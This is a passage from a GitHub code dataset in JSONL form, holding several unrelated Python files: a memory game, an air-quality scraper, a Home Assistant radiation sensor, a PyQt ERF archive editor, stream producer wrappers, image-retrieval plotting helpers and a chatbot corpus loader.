exp_ind \r\n WIDTH = 600\r\n cards = list(range(9)) + list(range(9)) #generates list with numbers\r\n card_pos = [WIDTH/36.0 - 15, 70] #determine the position of the first card (to be used in draw(canvas)\r\n exposed = list(18 * [False]) #generates list of exposed elements, with True for exposed \r\n state = 0 #determines the state of the game\r\n click_count = 0.5\r\n n = -1 #determines the position of the previous clicked card\r\n m = -1 #determines the position of pre-previous clicked card\r\n exp_ind = [] #list with indexes of exposed elements\r\n random.shuffle(cards)\r\n \r\n# define event handlers\r\ndef mouseclick(pos):\r\n global exposed, state, click_count, n, m, label, exp_ind\r\n for i in range(0,18): #sections iterator in canvas\r\n if pos[0] in range(i * WIDTH/18, (i + 1) * WIDTH/18): #to determine the section number in canvas\r\n if i not in exp_ind: #checks if we click on already exposed index\r\n exposed[i] = True \r\n exp_ind.append(i) #adds i to exposed indexes list 'exp_ind'\r\n click_count += 0.5\r\n if state == 0:\r\n state = 1\r\n elif state == 1:\r\n if cards[i] == cards[n]:\r\n state = 0\r\n else:\r\n state = 2\r\n elif state == 2:\r\n exp_ind.remove(m) #removes previous element from exp_ind list\r\n exp_ind.remove(n) #removes pre-previous element from exp_ind list\r\n exposed[n] = False\r\n exposed[m] = False\r\n state = 1\r\n m = n\r\n n = i\r\n \r\n# cards are logically 50x100 pixels in size \r\ndef draw(canvas):\r\n global card_pos, exposed, click_count, label\r\n label.set_text(\"Turns = \" + str(int(click_count)))\r\n n = 0\r\n n2 = 0\r\n #looks for exposed and not exposed cards and draws appropriate text or color\r\n for i in range(len(cards)):\r\n if not exposed[i]:\r\n canvas.draw_line((card_pos[0] + 15 + n * WIDTH/18.0, 0), (card_pos[0] + 15 + n * WIDTH/18.0, 100), WIDTH/18.0, 'Green')\r\n elif exposed[i]: \r\n canvas.draw_text(str(cards[i]),[card_pos[0] + (WIDTH/18.0) * n, card_pos[1]], 42, \"White\")\r\n n += 1\r\n #draws a separator between cards\r\n for i in range(19):\r\n canvas.draw_line([(WIDTH/18.0) * n2, 0], [(WIDTH/18.0) * n2, 100], 2, \"Violet\")\r\n n2 += 1\r\n\r\n# create frame and add a button and labels\r\nframe = simplegui.create_frame(\"Memory\", 800, 100)\r\nframe.add_button(\"Reset\", new_game)\r\nlabel = frame.add_label(\"Turhjns = 0\")\r\n\r\n# register event handlers\r\nframe.set_mouseclick_handler(mouseclick)\r\nframe.set_draw_handler(draw)\r\n\r\n# get things rolling\r\nnew_game()\r\nframe.start()\r\n\r\n\r\n# Always remember to review the grading rubric","repo_name":"imusiievych/coursera_interactive_python","sub_path":"memory_coursera_game.py","file_name":"memory_coursera_game.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35796229285","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nfrom sortedcontainers import SortedDict\n\ndef Wroc_Pow():\n r = requests.get('http://powietrze.gios.gov.pl/pjp/current/station_details/table/129/1/0')\n soup = BeautifulSoup(r.content, 'lxml')\n\n tables = soup.findChildren('table')\n\n\n my_table = tables[0]\n\n answer = {}\n rows = my_table.findChildren(['th', 'tr'])\n\n regex = re.compile(r'[\\n\\r\\t]')\n\n\n for row in rows:\n row_text = []\n date = ''\n for cell in row.find_all('th'):\n if cell.text.strip():\n t = regex.sub(\"\", cell.text)\n date = t\n\n for cell in row.find_all('td'):\n if cell.text.strip():\n t = regex.sub(\"\", cell.text)\n row_text.append(t)\n\n answer[str(date)] = row_text\n\n no_keys = {k: v for k, v in answer.items() if k}\n result = {k: v for k, v in no_keys.items() if v}\n\n for k in result.keys():\n if len(result[k]) > 2:\n result[k][0] = {'PM 2.5' : str(result[k][0])}\n result[k][1] = {'NO2' : str(result[k][1])}\n result[k][2] = {'CO' : str(result[k][2])}\n else:\n pass\n\n\n mydict = { k:v for k,v in result.items() if len(result[k]) > 2 }\n result = SortedDict(mydict)\n\n for item in result.keys():\n list_to_dict = {}\n for i in result[item]:\n list_to_dict.update(i)\n result[item] = list_to_dict\n\n import pandas as pd\n df = pd.DataFrame.from_dict(result, orient='index')\n df.reset_index(level=0, inplace=True)\n\n import sqlite3\n conn = sqlite3.connect(\"db.sqlite3\")\n df.to_sql('Wrocław Powstańców Śląskich', conn, if_exists='replace', index=False)\n","repo_name":"adrianwizowski/WebSite","sub_path":"Wroclaw - Powstancow.py","file_name":"Wroclaw - Powstancow.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74469911824","text":"import json\nimport logging\nimport voluptuous as vol\nimport aiohttp\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nfrom homeassistant.helpers.aiohttp_client import async_get_clientsession\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.helpers.discovery import async_load_platform\n\nREQUIREMENTS = [ ]\n\n_LOGGER = logging.getLogger(__name__)\n\nCONF_ATTRIBUTION = \"Data provided by katasztrofavedelem.hu\"\nCONF_NAME = 'name'\nCONF_STATION = 'station'\n\nDEFAULT_NAME = 'Radioactivity HU'\nDEFAULT_STATION = ''\nDEFAULT_ICON = 'mdi:radioactive'\n\nSCAN_INTERVAL = timedelta(minutes=30)\nTWO_DAYS = 172800 # secs\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_STATION, default=DEFAULT_STATION): cv.string,\n})\n\nasync def async_setup_platform(hass, config, async_add_devices, discovery_info=None):\n name = config.get(CONF_NAME)\n station = config.get(CONF_STATION)\n\n async_add_devices(\n [RadioactivityHUSensor(hass, name, station )],update_before_add=True)\n\nasync def async_get_wqdata(self):\n wqjson = {}\n url = 'https://www.katasztrofavedelem.hu/application/uploads/cache/hattersugarzas/RAD.json'\n async with self._session.get(url) as response:\n rsp1 = await response.text()\n\n wqjson = json.loads(rsp1)\n\n return wqjson\n\nclass RadioactivityHUSensor(Entity):\n\n def __init__(self, hass, name, station):\n \"\"\"Initialize the sensor.\"\"\"\n self._hass = hass\n self._name = name\n self._station = station\n self._state = None\n self._wqdata = {}\n self._icon = DEFAULT_ICON\n self._session = async_get_clientsession(hass)\n self._attr = {}\n\n @property\n def extra_state_attributes(self):\n\n return self._attr\n\n async def async_update(self):\n wqdata = await async_get_wqdata(self)\n max_state = 0\n max_station = ''\n max_lasttime = ''\n\n self._attr[\"provider\"] = CONF_ATTRIBUTION\n self._attr[\"unit_of_measurement\"] = \"nSv/h\"\n\n if 'errorMessage' in wqdata and wqdata[\"errorMessage\"] == \"OK\":\n self._wqdata = wqdata\n\n today = datetime.now()\n\n for i in wqdata[\"data\"]:\n if len(self._station) != 0:\n if i[\"location\"] == self._station:\n if i[\"lastMeasurement\"] is not None:\n self._state = str(int(float(i[\"lastMeasurement\"])))\n else:\n continue\n if i[\"active\"] is not None:\n self._attr[\"active\"] = i[\"active\"]\n if i[\"lastMeasurementTime\"] is not None:\n self._attr[\"last_measurement_time\"] = i[\"lastMeasurementTime\"]\n self._attr[\"station\"] = self._station\n break\n else:\n if i[\"lastMeasurement\"] == None or i[\"active\"] == None:\n continue\n if i[\"active\"] == \"false\":\n continue\n\n if i[\"lastMeasurementTime\"] != None:\n tstamp = datetime.strptime(i[\"lastMeasurementTime\"],\"%Y-%m-%d %H:%M:%S\").date()\n if int(datetime.now().strftime('%s')) - int(tstamp.strftime('%s')) > TWO_DAYS:\n continue\n\n if float(i[\"lastMeasurement\"]) > max_state:\n max_state = float(i[\"lastMeasurement\"])\n max_station = i[\"location\"]\n max_lasttime = i[\"lastMeasurementTime\"]\n if len(self._station) == 0:\n self._state = str(int(max_state))\n self._attr[\"station\"] = max_station\n self._attr[\"last_measurement_time\"] = max_lasttime\n self._attr[\"active\"] = \"true\"\n\n return self._state\n\n @property\n def name(self):\n return self._name\n\n @property\n def state(self):\n return self._state\n\n @property\n def icon(self):\n return DEFAULT_ICON\n\n @property\n def unique_id(self):\n return self._name + \"_\" + self._station\n","repo_name":"amaximus/radioactivity_hu","sub_path":"custom_components/radioactivity_hu/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"9896922812","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport json\nimport re\nimport fnmatch\n\nfrom PyQt5 import QtCore\n\nfrom PyQt5 import QtWidgets, QtGui\n\nfrom PyQt5.QtWidgets import QMessageBox\n\nfrom pynwn.file.erf import Erf\nfrom pynwn.resource import ResTypes, ContentObject\n\nfrom widgets.MainWidget import MainWidget\n\nclass ErfReadThread(QtCore.QThread):\n erfLoaded = QtCore.pyqtSignal(Erf)\n\n def __init__(self, parent=None):\n super(ErfReadThread, self).__init__(parent)\n\n def setFileName(self, name):\n self.file_name = name\n\n def run(self):\n try:\n erf = Erf.from_file(self.file_name)\n except:\n erf = Erf('HAK')\n self.erfLoaded.emit(erf)\n\n def begin(self):\n self.start()\n\nclass ErfSortFilterProxyModel(QtCore.QSortFilterProxyModel):\n def __init__(self, parent=None):\n super(ErfSortFilterProxyModel, self).__init__(parent)\n self.filters = {}\n\n def setFilter(self, idx, pat):\n if len(pat):\n self.filters[idx] = pat\n else:\n self.filters.pop(idx, None)\n self.invalidateFilter()\n\n def filterAcceptsRow(self, sourceRow, sourceParent):\n if 1 in self.filters:\n idx = self.sourceModel().index(sourceRow, 1, sourceParent)\n if not re.match(self.filters[1], idx.data()):\n return False\n if 0 in self.filters:\n idx = self.sourceModel().index(sourceRow, 0, sourceParent)\n if not fnmatch.fnmatch(idx.data(), self.filters[0]):\n return False\n\n return True\n\nclass ErfGridModel(QtCore.QAbstractTableModel):\n columnNames = ['Resource', 'Type', 'Size (bytes)']\n\n def __init__(self, erf, parent=None, *args):\n super(ErfGridModel, self).__init__()\n self.erf = erf\n\n def rowCount(self, parent=QtCore.QModelIndex()):\n return len(self.erf)\n\n def columnCount(self, parent=QtCore.QModelIndex()):\n return 3\n\n def data(self, index, role=QtCore.Qt.DisplayRole):\n i = index.row()\n j = index.column()\n if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:\n co = self.erf.get_content_object(i)\n if j == 0:\n return co.resref\n elif j == 1:\n return ResTypes[co.res_type]\n elif j == 2:\n return co.size\n elif role == QtCore.Qt.TextAlignmentRole:\n if j == 1 or j == 2:\n return QtCore.Qt.AlignCenter\n else:\n return QtCore.QVariant()\n\n def flags(self, index):\n defaultFlags = QtCore.QAbstractTableModel.flags(self, index)\n if index.isValid():\n return QtCore.Qt.ItemIsDragEnabled | QtCore.Qt.ItemIsDropEnabled | defaultFlags\n else:\n return QtCore.Qt.ItemIsDropEnabled | defaultFlags;\n\n def headerData(self, section, orientation, role):\n if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n return self.columnNames[section]\n\n def setData(self, index, value, role):\n if not index.isValid() or role != QtCore.Qt.EditRole: return False\n i = index.row()\n j = index.column()\n\n return False\n\n def addFiles(self, files):\n for f in files:\n self.erf.add_file(f)\n self.layoutChanged.emit()\n\n def deleteFiles(self, files):\n if not len(files): return\n for f in files:\n self.erf.remove(f)\n self.layoutChanged.emit()\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n\n self.settings = QtCore.QSettings()\n self.recentFiles = []\n self.readSettings()\n self.current_row = 0\n self.mainWidget = MainWidget(self)\n self.setCentralWidget(self.mainWidget)\n self.mainWidget.filterEdit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp('([a-zA-Z0-9_\\?\\*]+ ?)*')))\n self.mainWidget.resourceTable.needNewErf.connect(self.newErf)\n self.grid_model = None\n self.proxy = None\n self.modified = False\n self.fileName = None\n self.current_stack = 0\n self.createActions()\n self.createMenus()\n self.initTypeCombo()\n self.setWindowTitle(\"ErfEd\")\n self.resize(500, 600)\n self.thread = ErfReadThread(self)\n self.thread.erfLoaded.connect(self.erfReady)\n hh = self.mainWidget.resourceTable.horizontalHeader()\n hh.sectionClicked.connect(self.onHeaderSectionClicked)\n self.mainWidget.descriptionText.textChanged.connect(self.descrptionChanged)\n\n def onPreviousButton(self):\n if self.current_row == 0: return\n self.current_row -= 1\n self.changeRow(self.current_row)\n\n def onNextButton(self):\n if self.current_row + 1 >= len(self.erf.rows): return\n self.current_row += 1\n self.changeRow(self.current_row)\n\n def changeRow(self, row):\n self.row_model.setRow(row)\n self.current_row = row\n\n def openErfFile(self):\n fname, _ = QtWidgets.QFileDialog.getOpenFileName(self,\n \"Open Erf File\", '',\n \"ERF Files (*.erf *.mod *.hak)\")\n if fname:\n self.open(fname)\n\n def openRecent(self):\n act = self.sender()\n if not act is None:\n fname = act.data()\n self.open(fname)\n\n def newErf(self):\n self.fileName = None\n self.setErfObject(Erf('HAK'))\n\n def erfReady(self, erf):\n self.setErfObject(erf)\n self.progress.hide()\n self.progress = None\n\n def open(self, fname):\n if self.modified and self.checkSave() == QMessageBox.Save:\n self.save()\n\n self.fileName = fname\n self.progress = QtWidgets.QProgressDialog('Loading...', None, 0, 0, self, QtCore.Qt.SplashScreen)\n self.progress.setValue(0)\n self.progress.show()\n self.setErfObject(Erf('HAK'))\n self.thread.setFileName(self.fileName)\n self.thread.begin()\n\n self.recentFiles = [f for f in self.recentFiles if f.lower() != self.fileName.lower()]\n\n if len(self.recentFiles) >= 10:\n self.recentFiles.pop()\n\n self.recentFiles.insert(0, self.fileName)\n for i, fname in enumerate(self.recentFiles):\n self.recentFileActs[i].setText(\"&%d - %s\" % (i+1, fname))\n self.recentFileActs[i].setData(fname)\n self.recentFileActs[i].setVisible(True)\n\n\n def about(self):\n QtWidgets.QMessageBox.about(self, \"About Erf\",\n \"Edit Erf files\")\n\n def createActions(self):\n self.newErfFileAct = QtWidgets.QAction(\"&New\", self,\n shortcut=\"Ctrl+N\",\n triggered=self.newErf)\n\n self.openErfFileAct = QtWidgets.QAction(\"&Open\", self,\n shortcut=\"Ctrl+O\",\n triggered=self.openErfFile)\n\n self.saveAct = QtWidgets.QAction(\"&Save\", self,\n shortcut=\"Ctrl+S\", triggered=self.save)\n\n self.saveAsAct = QtWidgets.QAction(\"Save As...\", self,\n shortcut=\"Ctrl+Alt+S\", triggered=self.saveAs)\n\n self.exitAct = QtWidgets.QAction(\"E&xit\", self, shortcut=\"Ctrl+Q\",\n triggered=self.close)\n\n self.aboutAct = QtWidgets.QAction(\"&About\", self, triggered=self.about)\n\n self.aboutQtAct = QtWidgets.QAction(\"About &Qt\", self,\n triggered=QtWidgets.QApplication.instance().aboutQt)\n\n self.exportAct = QtWidgets.QAction(\"&Export\", self,\n shortcut=\"Ctrl+E\",\n triggered=self.export)\n\n self.exportAllAct = QtWidgets.QAction(\"Export All\", self, triggered=self.exportAll)\n\n def export(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Export To...'\n '.')\n select = self.mainWidget.resourceTable.selectionModel().selectedRows()\n for s in select:\n idx = self.mainWidget.resourceTable.model().index(s.row(), 0)\n resref = idx.data()\n idx = self.mainWidget.resourceTable.model().index(s.row(), 1)\n ext = idx.data()\n fname = '%s.%s' % (resref, ext)\n co = self.erf.get_content_object(fname)\n co.write_to(os.path.join(path, fname))\n\n def exportAll(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Export To...'\n '.')\n for co in self.erf.content:\n co.write_to(os.path.join(path, co.get_filename()))\n\n def createMenus(self):\n self.fileMenu = self.menuBar().addMenu(\"&File\")\n self.fileMenu.addAction(self.newErfFileAct)\n self.fileMenu.addAction(self.openErfFileAct)\n self.fileMenu.addSeparator()\n self.fileMenu.addAction(self.saveAct)\n self.fileMenu.addAction(self.saveAsAct)\n self.fileMenu.addSeparator()\n self.recentMenu = self.fileMenu.addMenu('Recent')\n\n self.recentFileActs = []\n for i in range(10):\n act = QtWidgets.QAction(self)\n act.setVisible(False)\n act.triggered.connect(self.openRecent)\n self.recentMenu.addAction(act)\n self.recentFileActs.append(act)\n\n for i, fname in enumerate(self.recentFiles):\n self.recentFileActs[i].setText(\"&%d - %s\" % (i+1, fname))\n self.recentFileActs[i].setData(fname)\n self.recentFileActs[i].setVisible(True)\n\n self.fileMenu.addSeparator()\n self.fileMenu.addAction(self.exitAct)\n\n self.resMenu = self.menuBar().addMenu(\"&Resource\")\n self.resMenu.addAction(self.exportAct)\n self.resMenu.addAction(self.exportAllAct)\n\n self.mainWidget.typeCombo.currentIndexChanged.connect(self.onTypeComboChanged)\n self.mainWidget.filterEdit.editingFinished.connect(self.onFilterChanged)\n self.menuBar().addSeparator()\n self.helpMenu = self.menuBar().addMenu(\"&Help\")\n self.helpMenu.addAction(self.aboutAct)\n self.helpMenu.addAction(self.aboutQtAct)\n\n def onTypeComboChanged(self, idx):\n if not self.proxy is None:\n text = self.mainWidget.typeCombo.currentText()\n if text == 'All':\n self.proxy.setFilter(1, '')\n else:\n self.proxy.setFilter(1, text)\n\n def onFilterChanged(self):\n if not self.proxy is None:\n self.proxy.setFilter(0, self.mainWidget.filterEdit.text())\n\n def updateModels(self, erf):\n # Grid model\n self.grid_model = ErfGridModel(erf)\n self.proxy = ErfSortFilterProxyModel(self)\n self.proxy.setSourceModel(self.grid_model)\n self.proxy.sort(0)\n self.mainWidget.resourceTable.setModel(self.proxy)\n self.mainWidget.typeCombo.setCurrentIndex(0)\n self.grid_model.layoutChanged.connect(self.changed)\n self.loaded = False\n hh = self.mainWidget.resourceTable.horizontalHeader()\n hh.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n\n def onHeaderSectionClicked(self, idx):\n if self.proxy.sortOrder() == QtCore.Qt.AscendingOrder:\n order = QtCore.Qt.DescendingOrder\n else:\n order = QtCore.Qt.AscendingOrder\n\n self.proxy.sort(idx, order)\n\n def setErfObject(self, erf):\n self.erf = erf\n self.mainWidget.descriptionText.setPlainText(erf.description(0))\n self.updateModels(erf)\n self.setModified(False)\n\n def descrptionChanged(self):\n if self.erf.description(0) != self.mainWidget.descriptionText.toPlainText():\n self.erf.set_description(self.mainWidget.descriptionText.toPlainText(), 0)\n self.setModified(True)\n\n def changed(self):\n self.setModified(True)\n\n def initTypeCombo(self):\n self.mainWidget.typeCombo.addItem('All')\n self.mainWidget.typeCombo.addItems(sorted([v for _, v in ResTypes.items()]))\n\n def setModified(self, modified):\n self.modified = modified\n if self.fileName is None:\n if modified:\n self.setWindowTitle(\"ErfEd - unnamed*\")\n else:\n self.setWindowTitle(\"ErfEd - unnamed\")\n elif self.modified:\n self.setWindowTitle(\"ErfEd - %s*\" % os.path.basename(self.fileName))\n else:\n self.setWindowTitle(\"ErfEd - %s\" % os.path.basename(self.fileName))\n\n def saveAndReload(self, fileName):\n self.erf.write_to(self.fileName)\n self.setModified(False)\n self.open(self.fileName)\n\n def save(self):\n if self.erf is None: return\n if not self.fileName:\n self.saveAs()\n else:\n self.saveAndReload(self.fileName)\n\n def saveAs(self):\n fileName, _ = QtWidgets.QFileDialog.getSaveFileName(self, \"Open Erf File\",\n self.fileName,\n \"ERF Files (*.hak *.mod *.erf)\")\n\n if fileName:\n ext = os.path.splitext(fileName)[1][1:].upper()\n if self.erf.ftype != ext and ext in Erf.TYPES:\n self.erf.ftype = ext\n saveAndReload(fileName)\n\n def readSettings(self):\n size = self.settings.beginReadArray('Recent Files')\n for i in range(size):\n self.settings.setArrayIndex(i)\n self.recentFiles.append(self.settings.value('file'))\n self.settings.endArray()\n\n\n def writeSettings(self):\n self.settings.beginWriteArray('Recent Files', len(self.recentFiles))\n for i, fname in enumerate(self.recentFiles):\n self.settings.setArrayIndex(i)\n self.settings.setValue('file', fname)\n self.settings.endArray()\n self.settings.setValue(\"Window/geometry\", self.saveGeometry())\n\n def restoreWindow(self):\n geom = self.settings.value(\"Window/geometry\")\n if not geom is None:\n self.restoreGeometry(geom)\n\n def checkSave(self):\n msgBox = QMessageBox()\n msgBox.setText(\"The file has been modified.\")\n msgBox.setInformativeText(\"Do you want to save your changes?\")\n msgBox.setStandardButtons(QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Save)\n return msgBox.exec()\n\n def closeEvent(self, event):\n if self.modified:\n ret = self.checkSave()\n if ret == QMessageBox.Save:\n self.save()\n elif ret == QMessageBox.Cancel:\n event.ignore()\n\n self.writeSettings()\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n QtCore.QCoreApplication.setOrganizationName(\"jmd\");\n QtCore.QCoreApplication.setOrganizationDomain(\"jmdean.me\");\n QtCore.QCoreApplication.setApplicationName(\"ErfEd\");\n\n mainWin = MainWindow()\n mainWin.restoreWindow()\n if len(sys.argv) > 1:\n f = QtCore.QFileInfo(os.path.abspath(sys.argv[1]))\n mainWin.open(f.filePath())\n mainWin.show()\n app.exec()\n","repo_name":"jd28/pynwn-tools","sub_path":"ErfEd/ErfEd.py","file_name":"ErfEd.py","file_ext":"py","file_size_in_byte":15481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4265943122","text":"import boto\nfrom boto.regioninfo import RegionInfo\nfrom boto.kinesis.exceptions import ResourceNotFoundException\nimport os\nfrom configparser import ConfigParser\nfrom kafka import KafkaProducer\nimport json\n\n\nclass StreamProducer:\n \"\"\"\n a client stream producer class supporting the following stream\n types:\n ['kinesis', 'kafka']\n default stream_type is 'kinesis'\n \"\"\"\n def __init__(self, stream_name, stream_platform='kinesis', hosts=None, conn=None):\n \"\"\"\n :param stream_name:\n :param part_key:\n :param stream_platform:\n :param hosts: for kafka\n :param conn: for kinesis\n \"\"\"\n ConnectParameterValidation.validate(stream_platform, conn, hosts)\n self.type = stream_platform\n\n # if conn and hosts:\n # raise ValueError('either a conn object OR hosts should be used. Not both!')\n\n # can we make this resolution elsewhere?\n # take out to separate method?\n if stream_platform == 'kinesis':\n conn_args = conn, stream_name\n elif stream_platform == 'kafka':\n conn_args = hosts, stream_name\n else:\n raise ValueError('unknown platform!')\n\n self._producer = self._get_producer()(*conn_args)\n\n def put_records(self, messages, part_key=None):\n producer = self._producer\n if self.type == 'kinesis':\n assert part_key is not None, \"For kinesis app the part_key arg should not be None\"\n\n producer.put_records(messages, part_key)\n print('DONE!')\n\n def put_record(self, message, part_key=None):\n if self.type == 'kinesis':\n assert part_key is not None, \"For kinesis app the part_key arg should not be None\"\n\n producer = self._producer\n producer.put_record(message)\n\n def _get_producer(self):\n if self.type == 'kinesis':\n return KinesisProducer\n elif self.type == 'kafka':\n return KafkaProducerWrapper\n else:\n raise ValueError('! unknown stream type: {}'.format(self.type))\n\n\nclass KinesisProducer:\n \"\"\"\n a Kinesis Stream producer class responsible for pushing\n messages into an AWS Kinesis Stream\n \"\"\"\n\n def __init__(self, kinesis_con, stream_name):\n self.stream_name = stream_name\n self.kinesis_con = kinesis_con\n\n def put_record(self, msg, part_key):\n self.kinesis_con.put_record(self.stream_name, msg, part_key)\n\n def put_records(self, msgs, part_key):\n for m in msgs:\n self.put_record(m, part_key)\n\n\nclass KinesisStreamHealthCheck:\n \"\"\"\n a Kinesis stream health checker to get information on\n a given stream's operability\n \"\"\"\n def __init__(self, stream_conn, stream_name):\n self._stream_connection = stream_conn\n self.stream_name = stream_name\n\n def check_active(self):\n return self._check_status() == 'ACTIVE'\n\n def check_deleting(self):\n return self._check_status() == 'DELETING'\n\n def _check_status(self):\n description_map = self._stream_connection.describe_stream(self.stream_name)\n description = description_map.get('StreamDescription')\n return description.get('StreamStatus')\n\n\nclass KafkaProducerWrapper:\n \"\"\"\n Kafka stream producer\n \"\"\"\n def __init__(self, hosts, topic_name):\n self.producer = KafkaProducer(bootstrap_servers=hosts,\n value_serializer=lambda x: json.dumps(x).encode('utf-8'))\n self.topic_name = topic_name\n\n def put_record(self, msg, part_key=None):\n self.producer.send(self.topic_name, msg, partition=part_key)\n\n def put_records(self, msgs, part_key=None):\n for msg in msgs:\n self.put_record(msg, part_key=part_key)\n self.producer.flush()\n\n\nclass ConnectionConfig:\n def __init__(self, platform):\n self.platform = platform\n\n def get(self):\n if self.platform == 'kinesis':\n return 'conn'\n elif self.platform == 'kafka':\n return 'hosts'\n else:\n raise ValueError('platform {} not supported!'.format(\n self.platform\n ))\n\n\nclass ConnectParameterValidation:\n @staticmethod\n def validate(platform, conn, hosts):\n _allowed_platforms = ('kinesis', 'kafka')\n\n if platform not in _allowed_platforms:\n raise ValueError(\"unknown platform '{}'! supported: {}\".format(\n platform,\n _allowed_platforms))\n\n if platform == 'kinesis' and not conn:\n raise ValueError('conn argument must be specified for a {} app'.format(\n platform\n ))\n\n elif platform == 'kafka' and not hosts:\n raise ValueError('conn argument must be specified for a {} app'.format(\n platform\n ))\n\n else:\n return\n\n","repo_name":"dron-dronych/streamz","sub_path":"producers.py","file_name":"producers.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16365482340","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom src.utils.annoy_utils import get_embedding\n\n\ndef normalized_img_tensor_to_rgb(img):\n rgb_img = img.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n rgb_img = std * rgb_img + mean\n rgb_img = np.clip(rgb_img, 0, 1)\n\n return rgb_img\n\n\ndef show_img(dataset, idx):\n img, class_id, superclass_id = dataset[idx]\n\n fig = plt.figure()\n rows, cols = 1, 1\n fig.add_subplot(rows, cols, 1)\n rgb_img = normalized_img_tensor_to_rgb(img)\n plt.imshow(rgb_img)\n\n plt.axis('off')\n plt.title('Image')\n print(f'Class id: {class_id}\\nSuper Class id: {superclass_id}\\n')\n\n\ndef show_retrieval(model, annoy_index, train_dataset, test_dataset, k_closest):\n length_test_dataset = len(test_dataset)\n\n plt.rcParams['figure.figsize'] = [15, 10]\n rows, cols = 5, 5\n f, axarr = plt.subplots(rows, cols)\n for row in range(rows):\n img_idx = random.randint(1, length_test_dataset - 1)\n img, true_class_id, true_superclass_id = test_dataset[img_idx]\n embedding = get_embedding(model, img)\n neighbours = annoy_index.get_nns_by_vector(embedding, k_closest) # get top k closest\n\n axarr[row, 0].imshow(normalized_img_tensor_to_rgb(img))\n axarr[row, 0].axis('off')\n axarr[row, 0].set_title(f'True Superclass {true_superclass_id}\\nTrue Class {true_class_id}')\n\n for col in range(1, cols):\n axarr[row, col].axis('off')\n if col - 1 >= len(neighbours):\n break\n\n img, pred_class_id, pred_superclass_id = train_dataset[neighbours[col - 1]]\n axarr[row, col].imshow(normalized_img_tensor_to_rgb(img))\n axarr[row, col].spines['bottom'].set_color('0.5')\n axarr[row, col].set_title(f'Predicted Superclass {pred_superclass_id}\\nPredicted Class {pred_class_id}')\n\n plt.subplots_adjust(top=1.4, bottom=0.01)\n line = plt.Line2D((.27, .27), (0, 1.4), color=\"grey\", linewidth=3, linestyle='--')\n f.add_artist(line)\n","repo_name":"denysgerasymuk799/UCU_CV_Metric_Learning_HW","sub_path":"src/utils/viz_utils.py","file_name":"viz_utils.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39915307924","text":"import os\nimport random\nimport codecs\nimport csv\nimport re\nimport unicodedata\nfrom ast import literal_eval\n\n\ndef printLines(file, n=10):\n '''function to print the first 10 lines of text'''\n with open(file, 'rb') as datafile:\n lines = datafile.readlines()\n for line in lines[:n]:\n print(line)\n\nclass load_corpus:\n def __init__(self, corpus_path):\n self.filepath = corpus_path\n \n # Splits each line of the file into a dictionary of fields\n def loadLines(self, fileName, fields):\n lines = {}\n with open(fileName, 'r', encoding='iso-8859-1') as f:\n for line in f:\n values = line.split(\" +++$+++ \")\n # Extract fields\n lineObj = {}\n for i, field in enumerate(fields):\n lineObj[field] = values[i]\n lines[lineObj['lineID']] = lineObj\n return lines\n \n \n # Groups fields of lines from `loadLines` into conversations based on *movie_conversations.txt*\n def loadConversations(self, fileName, lines, fields):\n conversations = []\n with open(fileName, 'r', encoding='iso-8859-1') as f:\n for line in f:\n values = line.split(\" +++$+++ \")\n # Extract fields\n convObj = {}\n for i, field in enumerate(fields):\n convObj[field] = values[i]\n # Convert string to list (convObj[\"utteranceIDs\"] == \"['L598485', 'L598486', ...]\")\n lineIds = eval(convObj[\"utteranceIDs\"])\n # Reassemble lines\n convObj[\"lines\"] = []\n for lineId in lineIds:\n convObj[\"lines\"].append(lines[lineId])\n conversations.append(convObj)\n return conversations\n \n \n # Extracts pairs of sentences from conversations\n def extractSentencePairs(self, conversations):\n qa_pairs = []\n for conversation in conversations:\n # Iterate over all the lines of the conversation\n for i in range(len(conversation[\"lines\"]) - 1): # We ignore the last line (no answer for it)\n inputLine = conversation[\"lines\"][i][\"text\"].strip()\n targetLine = conversation[\"lines\"][i+1][\"text\"].strip()\n # Filter wrong samples (if one of the lists is empty)\n if inputLine and targetLine:\n qa_pairs.append([inputLine, targetLine])\n return qa_pairs\n\n\nclass Voc:\n def __init__(self, name):\n \n # Default word tokens\n PAD_token = 0 # Used for padding short sentences\n SOS_token = 1 # Start-of-sentence token\n EOS_token = 2 # End-of-sentence token\n \n self.name = name\n self.trimmed = False\n self.word2index = {}\n self.word2count = {}\n self.index2word = {PAD_token: \"PAD\", SOS_token: \"SOS\", EOS_token: \"EOS\"}\n self.num_words = 3 # Count SOS, EOS, PAD\n\n def addSentence(self, sentence):\n for word 